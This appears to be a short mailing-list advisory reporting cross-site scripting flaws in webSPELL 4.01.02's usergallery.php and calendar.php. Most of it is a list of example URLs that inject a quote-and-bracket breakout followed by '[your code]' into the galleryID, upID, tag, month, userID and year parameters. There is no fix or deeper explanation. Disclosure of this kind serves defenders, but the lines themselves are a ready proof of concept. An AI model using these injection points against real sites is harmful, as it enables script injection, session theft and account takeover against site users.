<<< Date Index >>>     <<< Thread Index >>>

webSPELL 4.01.02 (calendar.php, usergallery.php) XSS Vulnerability



###################
Autor: Brainhead                                                        
Type: XSS                                                   
Version:  4.01.02                               
Files: usergallery.php, calendar.php                        
Magic Quotes :off                                         
###################
Examples:

http://site.tld/[PATH]/index.php?site=usergallery&action=upload&galleryID=";>[your
 code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&upID=";>[your 
code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&tag=";>[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&month=";>[your 
code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&userID=";>[your 
code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&year=";>[your 
code]